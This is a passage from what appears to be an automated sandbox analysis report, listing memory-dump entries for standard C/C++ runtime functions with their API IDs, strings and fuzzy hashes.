                                                              • Opcode Fuzzy Hash: e6b696b838180aeeb5d8db99cb0af4799342763c727a0bae7f89fe0791471731
                                                              • Instruction Fuzzy Hash: A4315232A0AA43A2EB54DB15E84017A73A1FF95BD4F484236DA5E837ADDF3CE561C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: 0d577c8873cb02b74a5d2540b211a9bb51c5b4332edea7e52b433389fe9cbf8c
                                                              • Instruction ID: 07fbcf0a962c2e4daebf94c4499f26f99f083da88054a756630370d6c9993fec
                                                              • Opcode Fuzzy Hash: 0d577c8873cb02b74a5d2540b211a9bb51c5b4332edea7e52b433389fe9cbf8c
                                                              • Instruction Fuzzy Hash: D5319522A0EA43A2EF54DB15E4801B977A1FB94BD4F084535EA9D837ADDF3CE561C310
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: 67b6caa33580ea919a601df496601060b12e44cfd7252ea35e28455147dcd832
                                                              • Instruction ID: 236b7b8cfaba2983b3a9bdce0d56302e2da1917e36f84b9a177bd4219e6bd622
                                                              • Opcode Fuzzy Hash: 67b6caa33580ea919a601df496601060b12e44cfd7252ea35e28455147dcd832
                                                              • Instruction Fuzzy Hash: D2316122A0EA43A2EB25DB15E48017977A1FF98BD4F180635DA5E837ADDE3CE5618700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: 95c4d019e337df2d27c4ae43ed6a612003bc9bb314e5d3e30eeae33b3e725eca
                                                              • Instruction ID: 8bb13738bed858ff0687177176410679230dda957cbed8e0d701ffd25fb2d274
                                                              • Opcode Fuzzy Hash: 95c4d019e337df2d27c4ae43ed6a612003bc9bb314e5d3e30eeae33b3e725eca
                                                              • Instruction Fuzzy Hash: 51316322A0EA43A2EE259B15E48017977A1FB88BD4F480635DA5EC37ADDF3CE5618700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: bedeafbaec8adbaae1230ad5c0c7c0810852a28c19c79fa022dfbe0f8d58771f
                                                              • Instruction ID: 17bc182b8cb9a60117786be5a2724c28ab3ad8b239e4ade4e99dacb721293c99
                                                              • Opcode Fuzzy Hash: bedeafbaec8adbaae1230ad5c0c7c0810852a28c19c79fa022dfbe0f8d58771f
                                                              • Instruction Fuzzy Hash: EE31C426A0AA4362EF15DB55E8401BA63A1FF85BD0F080235DA5DC37ADDF3CE461C350
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: 014dc6ca548d231dec55e1923c3463b5928a751829b2780844626360de8ace3c
                                                              • Instruction ID: a8c966ddcfa57f9de5a35fde77a1f973c0a60138eb77f6fdd38aac451b5f1838
                                                              • Opcode Fuzzy Hash: 014dc6ca548d231dec55e1923c3463b5928a751829b2780844626360de8ace3c
                                                              • Instruction Fuzzy Hash: D2318422A0FA4362EE159B59E5401B973A1EF95BE0F181531DB9D837ADDF3CE861C310
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 3523768491-393685449
                                                              • Opcode ID: 3ee202d90f6e6b7d6969c11b24808fbe1150c69e6f4b15407eb8d01be72417f8
                                                              • Instruction ID: cae8c843fd6604fc4c21d3cb2be589f21600a7109f4d047019c50ac33bfe0486
                                                              • Opcode Fuzzy Hash: 3ee202d90f6e6b7d6969c11b24808fbe1150c69e6f4b15407eb8d01be72417f8
                                                              • Instruction Fuzzy Hash: 57E1CE7391A7839AEB609F24D4803ED7BA4FB55748F244235DA9D8779ACF38E1A1C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 86a18549056dc6d76ac0abd78566524add973de1d0ba78654c8cdaa9775781b7
                                                              • Instruction ID: 01ceacef5aeb3bc741b2d3cd35f292061193c920320ec9814e527877dc661510
                                                              • Opcode Fuzzy Hash: 86a18549056dc6d76ac0abd78566524add973de1d0ba78654c8cdaa9775781b7
                                                              • Instruction Fuzzy Hash: BF51AD32A1A656ABE714DF25E844B797791FB04BD8F218530DE5E8778CDF39E8508B00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 2967684691-1405518554
                                                              • Opcode ID: 6a852068e18d71b0ce0acc72113bbfdafe7c2dbe35f4abdb51c183167ab0e0f7
                                                              • Instruction ID: 3c719a70aead1be345d11dbe2d512602610536d311111895e26b14eddf0364df
                                                              • Opcode Fuzzy Hash: 6a852068e18d71b0ce0acc72113bbfdafe7c2dbe35f4abdb51c183167ab0e0f7
                                                              • Instruction Fuzzy Hash: 73415A22B0BB42AAFB14DBB0D4502FC33B4AF54784F444035DE4EA6B99DF38D6269344
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: dd41b59062e1bded5e4a64ebb4ded833bad7bfefc86d4ef402e3721322b693a7
                                                              • Instruction ID: 0f179b3cde1e6aaa89e180b4f897a2f6dbb4d5079b708c96f6c71ebc722741ab
                                                              • Opcode Fuzzy Hash: dd41b59062e1bded5e4a64ebb4ded833bad7bfefc86d4ef402e3721322b693a7
                                                              • Instruction Fuzzy Hash: 20F05E61B2B603E1FB444BA5E4803742360AF54790F84583AD54FC677ACF2CE4B8C710
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: 61344d6823eee478dc0851b8babc93acb3fc4ce47a6e2b4299efaae8650d3a38
                                                              • Instruction ID: 301354397a35c2252e84cabaa94cd1fe18a0c7a36c18780846dcca5a82b15f54
                                                              • Opcode Fuzzy Hash: 61344d6823eee478dc0851b8babc93acb3fc4ce47a6e2b4299efaae8650d3a38
                                                              • Instruction Fuzzy Hash: 96B19E22E0F74BA9FA659B21954067D6390AF44BC4F298435DE8D8778EDF3CE4B28740
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                              • String ID:
                                                              • API String ID: 1087005451-0
                                                              • Opcode ID: 230dbc250809a90322377d94343768eb68c9b033416a55001241a1c5e3e2d059
                                                              • Instruction ID: ae2109f9aa7cef8d55720e40f72b54b4ed5e401c69491b80621ac81e9e1397b0
                                                              • Opcode Fuzzy Hash: 230dbc250809a90322377d94343768eb68c9b033416a55001241a1c5e3e2d059
                                                              • Instruction Fuzzy Hash: D1718122F0AB4299FB108BB5D4443EC6362EB557E8F404631DE5C97BDAEF78E1A58340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: b2c59d728636b0c6554cac728b920e7f028990e3d1f05e9dc6a8eba7ec4e4899
                                                              • Instruction ID: 462b003cf0476c084484f0f1ea4da538fec0a6d61933af4990cbe264848d723a
                                                              • Opcode Fuzzy Hash: b2c59d728636b0c6554cac728b920e7f028990e3d1f05e9dc6a8eba7ec4e4899
                                                              • Instruction Fuzzy Hash: A8513B22D0ED47A6F7229B38A45437A62A0BF43750F04C635ED4EA67DEDF3CA4A5C600
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                              • Instruction ID: c5b273f68857db37e8007e963fb2488d3da432902418bf4a80eab4e9b9ffb828
                                                              • Opcode Fuzzy Hash: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                              • Instruction Fuzzy Hash: E911E322E1EA0363F6586128E47177918406F67374F044A34E9BF963EFCE9CAD608100
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: 3b8f6f38903736f98fcdca112aa5d53be49a37cbb0ed99218ee9529973844066
                                                              • Instruction ID: 1e1750b71fc9b45728bbbc245494dd452c6db755719ec7d5cd338f20c13473b2
                                                              • Opcode Fuzzy Hash: 3b8f6f38903736f98fcdca112aa5d53be49a37cbb0ed99218ee9529973844066
                                                              • Instruction Fuzzy Hash: 0891E473A197869AE710CB65E4502ED77B0FB14788F20413AEE8D97B59DF38D1A5C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: $*
                                                              • API String ID: 3215553584-3982473090
                                                              • Opcode ID: 9e97f74fb747d070684286d516df8dd40ef65855817175db68c8e5f249a723b2
                                                              • Instruction ID: 9431fa1f67217dca89d2e9e01a47bfeba3630290e4511f17beba1c43b8e3879a
                                                              • Opcode Fuzzy Hash: 9e97f74fb747d070684286d516df8dd40ef65855817175db68c8e5f249a723b2
                                                              • Instruction Fuzzy Hash: 7961A57AD4E65397E7688F38905417C3BA1FB85B58F741139DA4A8639ECF28E4A1CB00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: cba4f8b5f87033059ccdbbbfc1978a4dfca7c68608478ea5e05f421b44258d1c
                                                              • Instruction ID: 84e23b58dbdc88182cc54a4e36e5f2789cd12da8f4fc7e17452ab8836134e527
                                                              • Opcode Fuzzy Hash: cba4f8b5f87033059ccdbbbfc1978a4dfca7c68608478ea5e05f421b44258d1c
                                                              • Instruction Fuzzy Hash: C6516D369092839AEB748B2595446B977A0FB54B84F244136EA5DC7BDECF3CE4B0C701
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: b3ad751d0cb4c71745f32e3f4ee4c7ad361712d25d56141f8ce21363a664fd63
                                                              • Instruction ID: 7ebf41e781ca5cb212dd8240aecb97d199405e7346c420605aed1ebad1483838
                                                              • Opcode Fuzzy Hash: b3ad751d0cb4c71745f32e3f4ee4c7ad361712d25d56141f8ce21363a664fd63
                                                              • Instruction Fuzzy Hash: A3514A37A09B869AE7208F65D4803ED77A0FB54B88F244225EF4D97B59DF38E4A5C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 2775327233-1405518554
                                                              • Opcode ID: e9dcfafce1d1b79f0454f0c7063429ff212ad751e0c1960cfd28cdf1e2b7ecd8
                                                              • Instruction ID: f904f23ab56c961fe0f6ee2e9f9fdceb647d2fc9359e2fd5e5beeea1e0d0b34c
                                                              • Opcode Fuzzy Hash: e9dcfafce1d1b79f0454f0c7063429ff212ad751e0c1960cfd28cdf1e2b7ecd8
                                                              • Instruction Fuzzy Hash: 3C412722B0BA42AAEF14DFB4D4902EC33A4EF84788F444435DA4DA6B5DDE38D5329354
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 2775327233-1405518554
                                                              • Opcode ID: 827cb531c25d537041628304b2b1cd442d8201b0c86c49ad65a9cdcbdbef1cee
                                                              • Instruction ID: acd6ef6228c2ae9ebc48dad6efddc5ff00bd9aea2837d78acbbb4a197f3ac12e
                                                              • Opcode Fuzzy Hash: 827cb531c25d537041628304b2b1cd442d8201b0c86c49ad65a9cdcbdbef1cee
                                                              • Instruction Fuzzy Hash: 79412C22B0BA42AAEF14DFB4D4902ED23A4EF84788F444435DA4DA7B59DE38D532D354
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __std_exception_copy.LIBVCRUNTIME ref: 00007FF6A00927B8
                                                                • Part of subcall function 00007FF6A009F4EC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F530
                                                                • Part of subcall function 00007FF6A009F4EC: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F576
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise__std_exception_copy
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 3973727643-1866435925
                                                              • Opcode ID: 0646b899308f3453d400320ab1734e666a4998a245cbdc518b35f174e8f0a7bc
                                                              • Instruction ID: ff2bc9e988268f8703b2961ba1d6ecb998b428084db4049cb1f688cdf1ac9d00
                                                              • Opcode Fuzzy Hash: 0646b899308f3453d400320ab1734e666a4998a245cbdc518b35f174e8f0a7bc
                                                              • Instruction Fuzzy Hash: A4218C22A1AA47A5EA049F24E8811F96361FF54784F988132DA4D8276EEF3CE5B5C340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 3215553584-3924258884
                                                              • Opcode ID: 2fb02fa14cb39cafdb2ac7ce505cebd37662ddc51a353eb412fb7d2a2d8dbfc1
                                                              • Instruction ID: 3355324010c6e58fe3b7488ff5e16773de15abde3265f9c4569d9432c29f34ce
                                                              • Opcode Fuzzy Hash: 2fb02fa14cb39cafdb2ac7ce505cebd37662ddc51a353eb412fb7d2a2d8dbfc1
                                                              • Instruction Fuzzy Hash: 35A1F422B1E647A9FB208B6090405FD23E5AF56BA4F944631DE5D97BCEEF3CD4628310
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 1467352782-3733052814
                                                              • Opcode ID: 1def0d11c4647c162defc29ee4d7443d642b152b28692578d685c6d7b4b99fdf
                                                              • Instruction ID: f413e3e188aedc31546562f7ba2d717739e82be5bab1aff29e15b894680393a9
                                                              • Opcode Fuzzy Hash: 1def0d11c4647c162defc29ee4d7443d642b152b28692578d685c6d7b4b99fdf
                                                              • Instruction Fuzzy Hash: 7771B07750A682AADB658B29D05077DBBA0EB55B88F248135DF8C87B89CF3CD661C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: e+000$gfff
                                                              • API String ID: 3215553584-3030954782
                                                              • Opcode ID: f4f137b188e5893866b64892a04e11eec720c8251b34085c1488a3329f5ed9d4
                                                              • Instruction ID: 922a5ff4db5dd16725bb37c42a08e9515647cfb744ff66e35f27645a5e1343a6
                                                              • Opcode Fuzzy Hash: f4f137b188e5893866b64892a04e11eec720c8251b34085c1488a3329f5ed9d4
